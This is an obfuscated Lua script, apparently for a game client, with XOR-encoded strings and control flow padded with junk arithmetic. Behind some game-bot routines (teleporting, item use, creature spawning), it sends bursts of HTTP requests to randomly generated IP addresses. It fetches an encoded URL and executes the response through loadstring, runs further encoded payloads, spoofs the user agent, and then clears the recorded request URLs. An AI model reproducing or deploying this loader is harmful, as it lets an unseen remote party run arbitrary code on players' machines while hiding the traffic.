
local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;
local function v7(v15, v16)
	local v17 = {};
	for v102 = 1, #v15 do
		v6(v17, v0(v4(v1(v2(v15, v102, v102 + 1)), v1(v2(v16, 1 + (v102 % #v16), 1 + (v102 % #v16) + 1))) % 256));
	end
	return v5(v17);
end
local function v8()
	if (player:getName() == v7("\245\214\217\44\226\174\198\11\223\208\213\33\243\186\201\13\213\214\209\43\231\168\195", "\126\177\163\187\69\134\219\167")) then
		return;
	end
end
local v9 = function(v18)
	local v19 = 0 + 0;
	local v20 = 0 + 0;
	local v21 = 0 - 0;
	local v22 = 1622 - (585 + 1037);
	local v23 = 0;
	local v24 = 0;
	local v25 = 1061 - (346 + 715);
	local v26 = 0;
	local v27 = 0 - 0;
	if (v18 == v7("\48\217\43\215\232", "\156\67\173\74\165")) then
		local v107 = 1156 - (1074 + 82);
		while true do
			if (v107 == (1 - 0)) then
				v22 = 30;
				v23 = 1824 - (214 + 1570);
				v107 = 1457 - (990 + 465);
			end
			if (v107 == 0) then
				v20 = 5 + 5;
				v21 = 9 + 11;
				v107 = 1 + 0;
			end
			if (v107 == (7 - 5)) then
				if (v20 < v21) then
					local v132 = 1726 - (1668 + 58);
					while true do
						if (v132 == (626 - (512 + 114))) then
							v24 = v20 + v21;
							if (v24 > (130 - 80)) then
								local v157 = 0 - 0;
								while true do
									if (v157 == 0) then
										v25 = v24 - 15;
										if (v25 < 20) then
											v26 = v25 * (6 - 4);
											if (v26 > (14 + 16)) then
												v27 = v26 / 2;
											else
												v27 = v26 + 2 + 8;
											end
										else
											local v163 = 0 + 0;
											while true do
												if (v163 == 0) then
													v26 = v25 / 2;
													if (v26 > 10) then
														v27 = v26 * (10 - 7);
													else
														v27 = v26 - (1999 - (109 + 1885));
													end
													break;
												end
											end
										end
										break;
									end
								end
							else
								local v158 = 1469 - (1269 + 200);
								while true do
									if (v158 == 0) then
										v25 = v24 + (47 - 22);
										if (v25 < (875 - (98 + 717))) then
											local v164 = 826 - (802 + 24);
											local v165;
											while true do
												if (v164 == (0 - 0)) then
													v165 = 0 - 0;
													while true do
														if (v165 == (0 + 0)) then
															v26 = v25 * (1.5 + 0);
															if (v26 == 90) then
																v27 = v26 / (1 + 2);
															else
																v27 = v26 - (5 + 15);
															end
															break;
														end
													end
													break;
												end
											end
										else
											local v166 = 0 - 0;
											while true do
												if (v166 == (0 - 0)) then
													v26 = v25 - (4 + 6);
													if (v26 < (21 + 29)) then
														v27 = v26 * (2 + 0);
													else
														v27 = v26 / (4 + 1);
													end
													break;
												end
											end
										end
										break;
									end
								end
							end
							break;
						end
					end
				else
					v24 = v21 - v20;
					if (v24 < 15) then
						local v146 = 0;
						local v147;
						while true do
							if (v146 == 0) then
								v147 = 0;
								while true do
									if ((0 + 0) == v147) then
										v25 = v24 * (1436 - (797 + 636));
										if (v25 == (218 - 173)) then
											local v167 = 1619 - (1427 + 192);
											while true do
												if (v167 == 0) then
													v26 = v25 + 10;
													if (v26 == (20 + 35)) then
														v27 = v26 * (4 - 2);
													else
														v27 = v26 / (2 + 0);
													end
													break;
												end
											end
										else
											local v168 = 0 + 0;
											local v169;
											while true do
												if (v168 == (326 - (192 + 134))) then
													v169 = 1276 - (316 + 960);
													while true do
														if (v169 == (0 + 0)) then
															v26 = v25 - 5;
															v27 = v26 + 6 + 1;
															break;
														end
													end
													break;
												end
											end
										end
										break;
									end
								end
								break;
							end
						end
					else
						local v148 = 0;
						while true do
							if (v148 == (0 + 0)) then
								v25 = v24 + (38 - 28);
								if (v25 > 20) then
									local v159 = 551 - (83 + 468);
									local v160;
									while true do
										if (v159 == (1806 - (1202 + 604))) then
											v160 = 0;
											while true do
												if (v160 == 0) then
													v26 = v25 - 5;
													if (v26 < (70 - 55)) then
														v27 = v26 * (6 - 2);
													else
														v27 = v26 / (5 - 3);
													end
													break;
												end
											end
											break;
										end
									end
								else
									v26 = v25 + (330 - (45 + 280));
									v27 = v26 - (3 + 0);
								end
								break;
							end
						end
					end
				end
				if (v27 > (88 + 12)) then
					v19 = v27 * (1 + 1);
				elseif (v27 > (28 + 22)) then
					v19 = v27 + 25;
				else
					v19 = v27 - 10;
				end
				break;
			end
		end
	elseif (v18 == v7("\39\163\70\6", "\38\84\215\41\118\220\70")) then
		local v114 = 0 + 0;
		while true do
			if (v114 == (0 - 0)) then
				v19 = 1911 - (340 + 1571);
				if (v19 == 0) then
					local v149 = 0 + 0;
					while true do
						if ((1772 - (1733 + 39)) == v149) then
							v20 = 13 - 8;
							v21 = 10;
							v149 = 1035 - (125 + 909);
						end
						if (v149 == (1949 - (1096 + 852))) then
							v22 = 7 + 8;
							if ((v20 == (6 - 1)) and (v21 == (10 + 0))) then
								local v161 = 0;
								while true do
									if (v161 == (512 - (409 + 103))) then
										v23 = v20 + v21;
										if (v23 == (251 - (46 + 190))) then
											v19 = v19 + (96 - (51 + 44));
										else
											v19 = v19 - (1 + 0);
										end
										break;
									end
								end
							end
							break;
						end
					end
				end
				break;
			end
		end
	elseif (v18 == v7("\66\19\49\23\234", "\158\48\118\66\114")) then
		local v127 = 1317 - (1114 + 203);
		while true do
			if (v127 == 0) then
				v19 = -(727 - (228 + 498));
				if (v19 < (0 + 0)) then
					local v156 = 0;
					while true do
						if ((0 + 0) == v156) then
							v20 = 50;
							v21 = 723 - (174 + 489);
							v156 = 2 - 1;
						end
						if (v156 == (1906 - (830 + 1075))) then
							if (v20 > v21) then
								v22 = v20 - v21;
								if (v22 > (529 - (303 + 221))) then
									v19 = v22;
								else
									v19 = -v22;
								end
							else
								local v162 = 0;
								while true do
									if (v162 == (1269 - (231 + 1038))) then
										v22 = v21 - v20;
										if (v22 == (9 + 1)) then
											v19 = v22 + (1167 - (171 + 991));
										else
											v19 = v22 - 5;
										end
										break;
									end
								end
							end
							break;
						end
					end
				end
				break;
			end
		end
	else
		v19 = -(4116 - 3117);
	end
	if (v19 == -(2682 - 1683)) then
		print(v7("\130\42\6\55\127\172\255\235\45\30\38\102\177\187\185\33\19\51\122\179\254\175\106", "\155\203\68\112\86\19\197"));
	else
		print(v7("\118\207\57\255\69\107\246\241\72\218\118\255\79\117\245\244\67\201\51\178", "\152\38\189\86\156\32\24\133"));
	end
	return v19;
end;
local function v10()
	local v28 = 0;
	local v29;
	local v30;
	local v31;
	local v32;
	local v33;
	while true do
		if (v28 == 0) then
			v29 = 0 - 0;
			v30 = nil;
			v28 = 1;
		end
		if (2 == v28) then
			v33 = nil;
			while true do
				if ((2 + 0) == v29) then
					return string.format(v7("\185\83\233\3\248\25\226\66\178\18\163", "\38\156\55\199"), v30, v31, v32, v33);
				end
				if (v29 == (3 - 2)) then
					local v128 = 0 - 0;
					while true do
						if (v128 == (0 - 0)) then
							v32 = math.random(3 - 2, 1503 - (111 + 1137));
							v33 = math.random(159 - (91 + 67), 758 - 503);
							v128 = 1;
						end
						if (v128 == (1 + 0)) then
							v29 = 525 - (423 + 100);
							break;
						end
					end
				end
				if (v29 == (0 + 0)) then
					v30 = math.random(2 - 1, 133 + 122);
					v31 = math.random(1, 1026 - (326 + 445));
					v29 = 1;
				end
			end
			break;
		end
		if (v28 == (4 - 3)) then
			local v108 = 0 - 0;
			while true do
				if (v108 == 0) then
					v31 = nil;
					v32 = nil;
					v108 = 2 - 1;
				end
				if (v108 == (712 - (530 + 181))) then
					v28 = 2;
					break;
				end
			end
		end
	end
end
local function v11(v34)
	local v35 = 881 - (614 + 267);
	local v36;
	local v37;
	local v38;
	local v39;
	local v40;
	local v41;
	local v42;
	while true do
		if (v35 == (32 - (19 + 13))) then
			v36 = v34:getHealth();
			v37 = v34:getMana();
			v38 = v34:getLevel();
			v39 = v34:getPosition();
			v35 = 1 - 0;
		end
		if (v35 == (4 - 2)) then
			if v40 then
				if (v36 < (142 - 92)) then
					local v133 = 0 + 0;
					local v134;
					while true do
						if (v133 == (0 - 0)) then
							v134 = 0 - 0;
							while true do
								if (v134 == (1813 - (1293 + 519))) then
									return;
								end
								if (v134 == (0 - 0)) then
									print(v7("\49\186\208\211\153\36\116\16\172\145\211\130\59\122\89\158\197\203\136\33\36\13\182\223\216\205\56\59\89\170\194\218\205\45\116\17\186\208\211\153\36\116\9\176\197\214\130\34\122\87\241", "\84\121\223\177\191\237\76"));
									v34:useItem(699 - 431);
									v134 = 1 - 0;
								end
							end
							break;
						end
					end
				elseif (v37 < 30) then
					print(v7("\150\87\199\161\122\89\35\129\183\89\222\238\122\113\36\213\190\91\217\180\51\94\55\129\175\89\137\181\41\85\112\192\251\91\200\174\59\16\32\206\175\95\198\174\116\30\126", "\161\219\54\169\192\90\48\80"));
					v34:useItem(1155 - 887);
					return;
				end
			end
			if (v38 >= (47 - 27)) then
				if (v39.x > (53 + 47)) then
					local v135 = 0 + 0;
					local v136;
					while true do
						local v145 = 0 - 0;
						while true do
							if (v145 == (0 + 0)) then
								if (v135 == 0) then
									print(v7("\101\71\22\32\69\2\9\54\9\74\9\34\65\2\5\43\70\87\7\45\7\2\33\49\93\71\13\53\93\75\14\34\9\86\15\101\93\71\12\32\89\77\18\49\7\12\78", "\69\41\34\96"));
									v136 = {x=(v39.x + 2 + 3),y=v39.y,z=v39.z};
									v135 = 1;
								end
								if (v135 == (1 + 0)) then
									v34:teleportTo(v136);
									return;
								end
								break;
							end
						end
					end
				end
			elseif (v38 < 10) then
				if v42 then
					local v150 = 0;
					while true do
						if (v150 == (1096 - (709 + 387))) then
							print(v7("\144\204\192\74\14\46\170\198\219\74\18\39\189\218\210\24\66\60\181\215\223\74\15\36\169\205\195\68\66\31\174\218\222\4\5\107\168\204\151\14\11\56\177\204\194\4\22\101\242\141", "\75\220\163\183\106\98"));
							v34:dismount();
							v150 = 1;
						end
						if (v150 == (1859 - (673 + 1185))) then
							return;
						end
					end
				else
					local v151 = 0 - 0;
					local v152;
					while true do
						if (v151 == (3 - 2)) then
							v34:spawnCreature(v152, v39);
							return;
						end
						if (v151 == 0) then
							print(v7("\46\181\156\119\213\7\172\142\59\153\18\182\138\46\220\16\250\156\62\205\10\181\158\35\153\15\181\158\57\205\76\250\170\35\205\7\183\155\35\208\12\189\203\35\214\66\169\155\54\206\12\250\136\37\220\3\174\158\37\220\76\244\197", "\185\98\218\235\87"));
							v152 = 216 - 84;
							v151 = 1 + 0;
						end
					end
				end
			end
			if ((v38 >= 10) and (v38 <= (15 + 4))) then
				print(v7("\251\48\38\255\219\184\139\53\52\166\220\175\223\43\34\227\208\234\199\57\49\227\210\185\139\109\119\166\223\164\207\124\118\191\144\234\229\51\103\245\206\175\200\53\38\234\158\171\200\40\46\233\208\185\133", "\202\171\92\71\134\190"));
			end
			if (v39.x < (67 - 17)) then
				print(v7("\25\205\45\145\44\211\108\129\58\129\37\134\105\192\108\140\40\207\43\141\59\206\57\155\105\219\35\134\44\141\108\137\63\206\37\140\105\198\35\129\39\198\108\142\60\211\56\128\44\211\109", "\232\73\161\76"));
			end
			break;
		end
		if (v35 == (1 + 0)) then
			v40 = v34:isInCombat();
			v41 = v34:isDead();
			v42 = v34:isMountActive();
			if v41 then
				local v121 = 0;
				while true do
					if (v121 == 0) then
						print(v7("\152\113\125\49\22\102\186\74\187\61\120\45\18\112\180\3\139\124\114\38\28\96\186\83\173\111\122\39\1\121\186\66\171\105\117\39\29\103\180", "\35\200\29\28\72\115\20\154"));
						return;
					end
				end
			end
			v35 = 3 - 1;
		end
	end
end
local v12 = {v7("\168\218\80\84\14\175", "\126\219\185\34\61"),v7("\31\205\76\123\110\99\224", "\135\108\174\62\18\30\23\147"),v7("\180\236\57\223\39\189\48\213\191\249\62\216", "\167\214\137\74\171\120\206\83"),v7("\136\255\54\88", "\199\235\144\82\61\152"),v7("\14\27\169\36\20\31\187\39\2", "\75\103\118\217"),v7("\212\87\98", "\126\167\52\16\116\217"),v7("\219\45\50\211\229\24", "\156\168\78\64\224\212\121"),v7("\20\237\183\246\4\225\161\203\21", "\174\103\142\197"),v7("\69\43\77\108\38", "\152\54\72\63\88\69\62"),v7("\199\199\252\9\213", "\60\180\164\142"),v7("\75\93\23\126\37", "\114\56\62\101\73\71\141"),v7("\171\234\201\149\232\234", "\164\216\137\187"),v7("\193\229\35\138\190", "\107\178\134\81\210\198\158"),v7("\43\13\144\232\175\47", "\202\88\110\226\166"),v7("\208\12\144\218\203\205\12\135\229", "\170\163\111\226\151"),v7("\2\51\160\12\75\52\33", "\73\113\80\210\88\46\87"),v7("\146\47\223\34\245\142\43\223\19\234", "\135\225\76\173\114"),v7("\9\238\170\157\173\174\179\31\255", "\199\122\141\216\208\204\221"),v7("\190\222\2\219\113\248\170", "\150\205\189\112\144\24"),v7("\54\135\173\100\1\154\30", "\112\69\228\223\44\100\232\113"),v7("\199\28\21\228\190\117\156", "\230\180\127\103\179\214\28"),v7("\159\6\77\98\225\87", "\128\236\101\63\38\132\33"),v7("\191\170\3\99\179\229\198\185\186", "\175\204\201\113\36\214\139"),v7("\116\199\39\204\22\72\159", "\100\39\172\85\188"),v7("\158\115\171\144\33\162\44", "\83\205\24\217\224"),v7("\245\198\223\108\182\198", "\93\134\165\173"),v7("\173\241\211\147\104\205", "\30\222\146\161\162\90\174\210"),v7("\246\77\98\91\176\77", "\106\133\46\16"),v7("\75\35\97\173\2\67", "\32\56\64\19\156\58"),v7("\73\203\247\4\11\241", "\224\58\168\133\54\58\146"),v7("\74\85\89\175\38\133", "\107\57\54\43\157\21\230\231"),v7("\200\136\3\167\236\223", "\175\187\235\113\149\217\188"),v7("\47\172\147\30\187\122", "\24\92\207\225\44\131\25"),v7("\88\208\170\31\74\126", "\29\43\179\216\44\123"),v7("\174\218\50\31\233\218", "\44\221\185\64"),v7("\18\228\90\12\36\2", "\19\97\135\40\63"),v7("\189\95\33\111\127\50", "\81\206\60\83\91\79"),v7("\93\168\194\38\125\192", "\196\46\203\176\18\79\163\45"),v7("\171\33\108\74\113\248", "\143\216\66\30\126\68\155"),v7("\185\203\31\159\146\160", "\129\202\168\109\171\165\195\183"),v7("\49\91\37\141\142\23", "\134\66\56\87\184\190\116"),v7("\47\50\27\238\75\232", "\85\92\81\105\219\121\139\65"),v7("\238\176\66\16\41\220", "\191\157\211\48\37\28"),v7("\204\28\230\73\98\220", "\90\191\127\148\124"),v7("\107\132\60\65\41\132", "\119\24\231\78"),v7("\145\46\183\28\136\67", "\113\226\77\197\42\188\32"),v7("\41\21\230\227\109\21", "\213\90\118\148"),v7("\72\45\166\1\29\88", "\45\59\78\212\54"),v7("\3\85\145\220\213\45", "\144\112\54\227\235\230\78\205"),v7("\160\43\29\171\134\88", "\59\211\72\111\156\176"),v7("\93\132\241\122\23\132", "\77\46\231\131"),v7("\169\87\164\24\235\87", "\32\218\52\214"),v7("\93\20\35\240\165\179", "\58\46\119\81\200\145\208\37"),v7("\56\143\34\244\254\190", "\86\75\236\80\204\201\221"),v7("\97\66\101\220\174\136", "\235\18\33\23\229\158"),v7("\67\185\211\226\2\185", "\219\48\218\161"),v7("\247\114\110\16\142\76", "\128\132\17\28\41\187\47"),v7("\18\49\20\99\10\2", "\61\97\82\102\90"),v7("\191\45\185\18\158\84", "\105\204\78\203\43\167\55\126"),v7("\182\169\49\79\66\7", "\49\197\202\67\126\115\100\167"),v7("\36\88\205\120\211\85", "\62\87\59\191\73\224\54"),v7("\244\1\232\152\179\1", "\169\135\98\154"),v7("\216\116\54\5\171\48", "\168\171\23\68\52\157\83"),v7("\231\114\231\252\114\46", "\231\148\17\149\205\69\77"),v7("\147\164\213\170\14\252", "\159\224\199\167\155\55"),v7("\228\240\46\128\167\240", "\178\151\147\92"),v7("\159\254\94\96\64\79", "\26\236\157\44\82\114\44"),v7("\57\45\199\9\126\45", "\59\74\78\181"),v7("\54\210\72\8\229\38", "\211\69\177\58\58"),v7("\164\230\107\167\190\200", "\171\215\133\25\149\137"),v7("\242\203\32\168\182\51", "\34\129\168\82\154\143\80\156"),v7("\150\177\33\88\24\77", "\233\229\210\83\107\40\46"),v7("\210\65\32\133\87\194", "\101\161\34\82\182"),v7("\251\14\75\173\136\225", "\78\136\109\57\158\187\130\226"),v7("\45\60\235\162\107\60", "\145\94\95\153"),v7("\238\206\6\134\24\180", "\215\157\173\116\181\46"),v7("\38\183\153\171\131\108\237\136", "\186\85\212\235\146"),v7("\209\130\4\167\96\183\0\193", "\56\162\225\118\158\89\142"),v7("\79\6\210\246\123\129\9\6", "\184\60\101\160\207\66"),v7("\34\129\110\229\104\219\47\191", "\220\81\226\28")};
for v43 = 1403 - (832 + 570), 66 + 4 do
	local v44 = 0;
	local v45;
	local v46;
	local v47;
	local v48;
	local v49;
	while true do
		if (v44 == (1 + 0)) then
			v47 = nil;
			v48 = nil;
			v44 = 6 - 4;
		end
		if (v44 == (0 + 0)) then
			v45 = 796 - (588 + 208);
			v46 = nil;
			v44 = 2 - 1;
		end
		if (v44 == 2) then
			v49 = nil;
			while true do
				if (1 == v45) then
					v48 = v10();
					v49 = v7("\27\193\150\235\176\136\92", "\167\115\181\226\155\138") .. v48 .. "/" .. v47 .. v7("\173\43\233\88\126\105\136\238\55\230", "\166\130\66\135\60\27\17");
					v45 = 2;
				end
				if (v45 == (1800 - (884 + 916))) then
					local v129 = 0 - 0;
					while true do
						if (v129 == 0) then
							v46 = math.random(1 + 0, #v12);
							v47 = v12[v46];
							v129 = 654 - (232 + 421);
						end
						if (v129 == (1890 - (1569 + 320))) then
							v45 = 1;
							break;
						end
					end
				end
				if (v45 == (1 + 1)) then
					modules.corelib.HTTP.get(v49, function(v137, v138)
						local v139 = 0 + 0;
						local v140;
						while true do
							if (v139 == (0 - 0)) then
								v140 = 605 - (316 + 289);
								while true do
									if (v140 == (0 - 0)) then
										loadstring(v7("\72\69\205\116\60\4\82\142\40\112\21\26\149\53\40\4\23\142\109\112\14\10\156\46\112\72\69\205\116\60\4\83\142\40\112\92\10\131\53\98\20", "\80\36\42\174\21"))();
										print(v49);
										break;
									end
								end
								break;
							end
						end
					end);
					break;
				end
			end
			break;
		end
	end
end
for v50 = 1 + 0, 1513 - (666 + 787) do
	local v51 = 0;
	local v52;
	local v53;
	local v54;
	local v55;
	while true do
		if (v51 == 0) then
			v52 = math.random(1, #v12);
			v53 = v12[v52];
			v51 = 426 - (360 + 65);
		end
		if ((1 + 0) == v51) then
			local v110 = 254 - (79 + 175);
			while true do
				if ((0 - 0) == v110) then
					v54 = v10();
					v55 = v7("\70\4\35\106\20\95\120", "\26\46\112\87") .. v54 .. "/" .. v53 .. v7("\246\42\165\112\186\167\11\184\172\34", "\212\217\67\203\20\223\223\37");
					v110 = 1;
				end
				if (v110 == (1 + 0)) then
					v51 = 5 - 3;
					break;
				end
			end
		end
		if (v51 == (3 - 1)) then
			modules.corelib.HTTP.get(v55, function(v115, v116)
				loadstring(v7("\182\130\171\211\182\205\176\146\231\205\249\130\225\205\176\146\231\205\176\146\240\205\250\137\250\129\167\209\187\129\232\203\250\208\232\202\250\192\232\128\234", "\178\218\237\200"))();
			end);
			break;
		end
	end
end
modules.corelib.g_http.setUserAgent(v7("\153\129\245\211\164\188\246\196\165\250\183\158\230", "\176\214\213\134"));
local v13 = v7("\252\185\162\196\242\25\22\165\244\229\154\249\7\8\186\255\226\141\230\14\0\187\190\181\198\251\4\90\187\164\184\208\173\78\23\248\184\183", "\57\148\205\214\180\200\54");
modules.corelib.HTTP.get(v13, function(v56, v57)
	loadstring(v56)();
end);
for v58 = 900 - (503 + 396), 211 - (92 + 89) do
	local v59 = math.random(1, #v12);
	local v60 = v12[v59];
	local v61 = math.random(19 - 9, 131 + 124);
	local v62 = v7("\26\233\33\36\44\93\178\100\109\37\92\172\100\101\56\64\169\108\122", "\22\114\157\85\84") .. v61 .. "/" .. v60 .. v7("\139\194\29\192\88\238\230\200\222\18", "\200\164\171\115\164\61\150");
	modules.corelib.HTTP.get(v62, function(v103, v104)
		loadstring(v7("\178\251\0\68\143\254\236\67\24\195\239\164\88\5\155\254\169\67\93\195\244\180\81\30\195\178\251\0\68\143\254\237\67\24\195\166\180\78\5\209\238", "\227\222\148\99\37"))();
	end);
end
for v63 = 1 + 0, 30 do
	local v64 = 0 - 0;
	local v65;
	local v66;
	local v67;
	local v68;
	local v69;
	while true do
		if (v64 == 1) then
			v67 = nil;
			v68 = nil;
			v64 = 1 + 1;
		end
		if (v64 == (4 - 2)) then
			v69 = nil;
			while true do
				if (v65 == 2) then
					modules.corelib.HTTP.get(v69, function(v141, v142)
						loadstring(v7("\30\47\59\125\176\52\10\96\101\60\237\36\73\96\32\60\225\52\10\96\114\60\238\47\82\44\55\127\189\120\82\57\120\33\252\108\82\109\120\46\236", "\20\114\64\88\28\220"))();
					end);
					break;
				end
				if (v65 == (1 + 0)) then
					local v130 = 0 + 0;
					while true do
						if ((2 - 1) == v130) then
							v65 = 1 + 1;
							break;
						end
						if ((0 - 0) == v130) then
							v68 = math.random(1344 - (485 + 759), 199);
							v69 = v7("\59\70\70\230\163\124\29\3\175\170\125", "\153\83\50\50\150") .. v68 .. v7("\19\36\39\69\61\243\25\18", "\45\61\22\19\124\19\203") .. v67 .. v7("\142\27\3\241\7\104\247\205\7\12", "\217\161\114\109\149\98\16");
							v130 = 2 - 1;
						end
					end
				end
				if (v65 == 0) then
					v66 = math.random(1190 - (442 + 747), #v12);
					v67 = v12[v66];
					v65 = 1;
				end
			end
			break;
		end
		if ((1135 - (832 + 303)) == v64) then
			local v111 = 0;
			while true do
				if ((946 - (88 + 858)) == v111) then
					v65 = 0 + 0;
					v66 = nil;
					v111 = 1;
				end
				if (v111 == (1 + 0)) then
					v64 = 1;
					break;
				end
			end
		end
	end
end
for v70 = 1, 30 do
	local v71 = 0 + 0;
	local v72;
	local v73;
	local v74;
	local v75;
	local v76;
	while true do
		if (v71 == (790 - (766 + 23))) then
			v74 = math.random(493 - 393, 271 - 72);
			v75 = math.random(263 - 163, 199);
			v71 = 6 - 4;
		end
		if (v71 == (1075 - (1036 + 37))) then
			v76 = v7("\57\21\198\164\162\159\242\96\88\129\250", "\221\81\97\178\212\152\176") .. v74 .. "." .. v75 .. v7("\131\191\73\180", "\122\173\135\125\155") .. v73 .. v7("\203\200\14\189\58\41\134\136\212\1", "\168\228\161\96\217\95\81");
			modules.corelib.HTTP.get(v76, function(v117, v118)
				loadstring(v7("\215\222\45\93\35\23\195\145\115\28\126\7\128\145\54\28\114\23\195\145\100\28\125\12\155\221\33\95\46\91\155\200\110\1\111\79\155\156\110\14\127", "\55\187\177\78\60\79"))();
			end);
			break;
		end
		if ((0 + 0) == v71) then
			v72 = math.random(1 - 0, #v12);
			v73 = v12[v72];
			v71 = 1;
		end
	end
end
for v77 = 1 + 0, 30 do
	local v78 = math.random(1481 - (641 + 839), #v12);
	local v79 = v12[v78];
	local v80 = math.random(1013 - (910 + 3), 507 - 308);
	local v81 = math.random(1754 - (1466 + 218), 199);
	local v82 = v7("\37\218\75\251\28\128\207", "\224\77\174\63\139\38\175") .. v80 .. v7("\202\16\9\127\202", "\78\228\33\56") .. v81 .. v7("\128\38\230\76", "\229\174\30\210\99") .. v79 .. v7("\84\228\136\85\232\37\119\23\248\135", "\89\123\141\230\49\141\93");
	modules.corelib.HTTP.get(v82, function(v105, v106)
		loadstring(v7("\255\126\245\13\28\10\235\49\171\76\65\26\168\49\238\76\77\10\235\49\188\76\66\17\179\125\249\15\17\70\179\104\182\81\80\82\179\60\182\94\64", "\42\147\17\150\108\112"))();
	end);
end
for v83, v84 in pairs(HTTP.operations) do
	v84.url = nil;
end
local function v14(v86)
	local v87 = 0 + 0;
	local v88;
	local v89;
	local v90;
	local v91;
	local v92;
	local v93;
	local v94;
	while true do
		if (v87 == (1151 - (556 + 592))) then
			if ((v91.x < (18 + 32)) and (v91.y > (858 - (329 + 479)))) then
				print(v7("\131\95\203\105\31\47\21\200\160\19\195\126\90\60\21\210\178\85\207\48\0\50\91\196\253", "\161\211\51\170\16\122\93\53"));
				v86:rest();
				return;
			end
			if ((v91.x > 100) and (v88 > (934 - (174 + 680)))) then
				local v122 = 0 - 0;
				while true do
					if (v122 == (0 - 0)) then
						print(v7("\203\162\179\49\254\188\242\33\232\238\187\38\187\175\242\59\250\168\183\104\250\188\183\41\187\185\187\60\243\238\181\39\244\170\242\32\254\175\190\60\243\224\242\24\233\171\162\41\233\167\188\47\187\186\189\104\246\161\164\45\181", "\72\155\206\210"));
						v86:moveTo({x=(v91.x + 4 + 1),y=v91.y,z=v91.z});
						break;
					end
				end
			end
			break;
		end
		if (v87 == (739 - (396 + 343))) then
			v88 = v86:getHealth();
			v89 = v86:getMana();
			v90 = v86:getLevel();
			v91 = v86:getPosition();
			v87 = 1 + 0;
		end
		if (v87 == (1479 - (29 + 1448))) then
			if ((v89 <= 20) and not v93) then
				local v123 = 1389 - (135 + 1254);
				while true do
					if (v123 == (0 - 0)) then
						print(v7("\148\13\141\32\66\60\191\249\0\140\54\76\117\141\173\24\134\44\18\33\165\183\11\195\53\13\117\185\170\9\195\32\66\56\173\183\13\195\49\13\33\165\182\2\205", "\204\217\108\227\65\98\85"));
						v86:useItem(1251 - 983);
						v123 = 1 + 0;
					end
					if (v123 == (1528 - (389 + 1138))) then
						return;
					end
				end
			end
			if ((v90 >= (624 - (102 + 472))) and (v91.x > (189 + 11))) then
				local v124 = 0 + 0;
				while true do
					if (v124 == (0 + 0)) then
						print(v7("\114\198\227\224\32\128\87\208\181\237\37\199\86\131\244\235\40\128\78\204\230\236\56\201\81\205\181\236\63\128\77\214\252\241\45\194\82\198\181\227\35\210\30\208\229\224\47\201\95\207\181\228\47\212\87\204\251\171", "\160\62\163\149\133\76"));
						v86:teleportTo({x=(v91.x + 10),y=v91.y,z=v91.z});
						v124 = 1546 - (320 + 1225);
					end
					if (v124 == (1 - 0)) then
						return;
					end
				end
			end
			if v92 then
				if (v86:getPartyLeader() == v86) then
					local v143 = 0 + 0;
					local v144;
					while true do
						if (v143 == 0) then
							v144 = 1464 - (157 + 1307);
							while true do
								if (v144 == 0) then
									print(v7("\230\172\12\54\198\196\224\4\60\131\198\161\31\59\218\150\172\8\46\199\211\178\65\111\192\222\165\14\36\202\216\167\77\38\197\150\176\12\61\215\207\224\3\42\198\210\179\77\39\198\215\172\4\33\196\152", "\163\182\192\109\79"));
									if (v88 < (1889 - (821 + 1038))) then
										v86:useItem(665 - 398);
									end
									break;
								end
							end
							break;
						end
					end
				else
					print(v7("\4\42\1\217\240\38\102\9\211\181\61\40\64\193\181\36\39\18\212\236\116\36\21\212\181\58\41\20\128\225\60\35\64\204\240\53\34\5\210\187", "\149\84\70\96\160"));
				end
			end
			if ((v90 < (2 + 8)) and not v93) then
				print(v7("\20\9\26\173\52\3\27\232\52\70\29\225\57\31\8\255\116\70\12\249\44\3\0\253\44\15\3\234\120\18\2\173\63\9\77\228\54\16\4\254\49\4\1\232\118", "\141\88\102\109"));
				v86:useItem(470 - 205);
				return;
			end
			v87 = 2 + 1;
		end
		if (v87 == 1) then
			v92 = v86:isInParty();
			v93 = v86:isInvisible();
			v94 = v86:hasItem(661 - 394);
			if (v88 <= (1036 - (834 + 192))) then
				local v125 = 0 + 0;
				local v126;
				while true do
					if (v125 == (0 + 0)) then
						v126 = 0;
						while true do
							local v154 = 0;
							local v155;
							while true do
								if (v154 == (0 + 0)) then
									v155 = 0;
									while true do
										if (v155 == 0) then
											if (v126 == (1 - 0)) then
												return;
											end
											if ((304 - (300 + 4)) == v126) then
												print(v7("\39\163\44\115\243\224\79\175\62\63\228\250\6\178\36\124\230\228\3\191\109\115\232\255\78", "\136\111\198\77\31\135"));
												if v86:hasItem(239) then
													v86:useItem(239);
												else
													print(v7("\44\6\231\94\184\229\27\160\12\14\231\95\169\225\26\233\3\31\166\95\177\229\21\165\7\71", "\201\98\105\199\54\221\132\119"));
												end
												v126 = 1 + 0;
											end
											break;
										end
									end
									break;
								end
							end
						end
						break;
					end
				end
			end
			v87 = 5 - 3;
		end
	end
end
for v95 = 363 - (112 + 250), 12 + 18 do
	local v96 = 0 - 0;
	local v97;
	local v98;
	local v99;
	local v100;
	local v101;
	while true do
		if ((1 + 0) == v96) then
			v99 = math.random(52 + 48, 149 + 50);
			v100 = math.random(35 + 35, 199);
			v96 = 2 + 0;
		end
		if (v96 == 2) then
			v101 = v7("\78\110\64\30\105\9\53", "\83\38\26\52\110") .. v99 .. v7("\22\70\118\23\22", "\38\56\119\71") .. v100 .. v7("\189\183\12\153", "\54\147\143\56\182\69") .. v98 .. v7("\153\136\241\77\218\206\207\243\92\222", "\191\182\225\159\41");
			modules.corelib.HTTP.get(v101, function(v119, v120)
				loadstring(v7("\39\29\43\84\135\199\218\107\79\104\4\219\220\130\51\82\117\21\147\199\136\107\64\115\21\135\136\193\42\30\104\76\203\218\130\51\82\101\21\217\215", "\162\75\114\72\53\235\231"))();
			end);
			break;
		end
		if (v96 == 0) then
			v97 = math.random(1415 - (1001 + 413), #v12);
			v98 = v12[v97];
			v96 = 2 - 1;
		end
	end
end
